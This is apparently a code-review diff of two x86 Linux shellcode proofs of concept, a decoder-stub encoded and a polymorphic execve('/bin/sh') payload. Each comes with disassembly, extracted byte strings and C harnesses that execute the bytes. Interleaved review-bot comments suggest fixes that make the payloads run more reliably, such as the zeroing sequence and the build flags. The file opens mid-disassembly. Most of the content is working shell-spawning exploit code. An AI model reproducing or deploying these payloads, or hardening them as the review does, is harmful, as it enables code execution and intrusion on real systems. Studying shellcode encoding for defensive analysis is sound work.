80480a3: 76 1d jbe 80480c2 <__bss_start+0x16>
80480a5: ac lods al,BYTE PTR ds:[esi]
80480a6: 76 1e jbe 80480c6 <__bss_start+0x1a>
80480a8: 4f dec edi
80480a9: f4 hlt
80480aa: 32 .byte 0x32
80480ab: 7f .byte 0x7f
[+] Extract Shellcode ...
"\xeb\x0c\x5e\x31\xc9\xb1\x19\xf6\x16\x46\xe2\xfb\xeb\x05\xe8\xef\xff\xff\xff\xce\x3f\xaf\x97\xd0\xd0\x8c\x97\x97\xd0\x9d\x96\x91\x76\x1c\xaf\x76\x1d\xac\x76\x1e\x4f\xf4\x32\x7f"
======================= POC Daniele Votta =======================
*/
/* NOT Encoded Execve /bin/sh */
unsigned char code[] = \
"\xeb\x0c\x5e\x31\xc9\xb1\x19\xf6\x16\x46\xe2\xfb\xeb\x05\xe8\xef\xff\xff\xff\xce\x3f\xaf\x97\xd0\xd0\x8c\x97\x97\xd0\x9d\x96\x91\x76\x1c\xaf\x76\x1d\xac\x76\x1e\x4f\xf4\x32\x7f";
int main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
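Review bot: `int (*ret)() = (int(*)())code; ret();` executes bytes placed in `.data`, which is not executable under default linker settings on current toolchains, and the decoder additionally writes to that region (`not BYTE PTR [esi]`), so the build line the author used (for example `gcc -m32 -z execstack -fno-stack-protector`) belongs in the header next to `Tested on: i686 GNU/Linux`. `printf("Shellcode Length: %d\n", strlen(code))` passes a `size_t` to `%d`; use `%zu`. The embedded encoder is Python 2 only (`print 'Encoded shellcode...'`), which should be stated since the file carries a `.py` name; the byte counts are otherwise consistent (`Shellcode Length:25` for the input matches `mov cl,0x19`, and 19 stub bytes plus 25 payload bytes give the stated 44).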
@ -0,0 +1,76 @@
/*
; Date: 09/03/2019
; Polymorphic_Execve_Sh_Stack.asm
; Author: Daniele Votta
; Description: This program invoke a Polimorphic version of excve.
Original Execve_Sh_Stack: file format elf32-i386
Disassembly of section .text:
08048080 <_start>:
8048080: 31 c0 xor eax,eax
8048082: 50 push eax
8048083: 68 2f 2f 73 68 push 0x68732f2f
8048088: 68 2f 62 69 6e push 0x6e69622f
804808d: 89 e3 mov ebx,esp
804808f: 50 push eax
8048090: 89 e2 mov edx,esp
8048092: 53 push ebx
8048093: 89 e1 mov ecx,esp
8048095: b0 0b mov al,0xb
8048097: cd 80 int 0x80
[+] Extract Shellcode ...
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
Shellcode Length:25
======================= POC Daniele Votta =======================
Polimorphic_Execve_Sh_Stack: file format elf32-i386
Disassembly of section .text:
08048080 <_start>:
8048080: 31 c3 xor ebx,eax
8048082: 31 d8 xor eax,ebx
8048084: 89 c1 mov ecx,eax
8048086: 51 push ecx
8048087: bf 40 40 84 79 mov edi,0x79844040
804808c: 81 ef 11 11 11 11 sub edi,0x11111111
8048092: 89 7c 24 fc mov DWORD PTR [esp-0x4],edi
8048096: bf 2f 62 69 6e mov edi,0x6e69622f
804809b: 81 c7 11 11 11 11 add edi,0x11111111
80480a1: 81 ef 11 11 11 11 sub edi,0x11111111
80480a7: 89 7c 24 f8 mov DWORD PTR [esp-0x8],edi
80480ab: 83 ec 04 sub esp,0x4
80480ae: 83 ec 04 sub esp,0x4
80480b1: 89 e3 mov ebx,esp
80480b3: 50 push eax
80480b4: 89 e2 mov edx,esp
80480b6: 53 push ebx
80480b7: 89 e1 mov ecx,esp
80480b9: b0 01 mov al,0x1
80480bb: 04 0a add al,0xa
80480bd: cd 80 int 0x80
[+] Extract Shellcode ...
"\x31\xc3\x31\xd8\x89\xc1\x51\xbf\x40\x40\x84\x79\x81\xef\x11\x11\x11\x11\x89\x7c\x24\xfc\xbf\x2f\x62\x69\x6e\x81\xc7\x11\x11\x11\x11\x81\xef\x11\x11\x11\x11\x89\x7c\x24\xf8\x83\xec\x04\x83\xec\x04\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x01\x04\x0a\xcd\x80"
Shellcode Length:63
======================= POC Daniele Votta =======================
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc3\x31\xd8\x89\xc1\x51\xbf\x40\x40\x84\x79\x81\xef\x11\x11\x11\x11\x89\x7c\x24\xfc\xbf\x2f\x62\x69\x6e\x81\xc7\x11\x11\x11\x11\x81\xef\x11\x11\x11\x11\x89\x7c\x24\xf8\x83\xec\x04\x83\xec\x04\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x01\x04\x0a\xcd\x80";
int main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
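Review bot: the opening pair `xor ebx,eax` / `xor eax,ebx` does not zero `eax`: after both instructions `eax` holds the original value of `ebx` (and `ebx` holds `eax^ebx`), so the pushed string terminator (`push ecx`), the `envp` pointer (`push eax`) and the syscall number built with `mov al,0x1` / `add al,0xa` are only correct when `ebx` was already zero on entry. In the C harness that is not guaranteed (32-bit PIC code uses `ebx` as the GOT base), so this variant is less robust than the original `xor eax,eax`; a zeroing sequence independent of register state, such as `sub eax,eax`, restores the behaviour. Also the header comment has typos (`Polimorphic`, `excve`), and as with any `.data`-resident payload this `main()` needs the executable-section build flags documented and `%zu` for the `strlen` result.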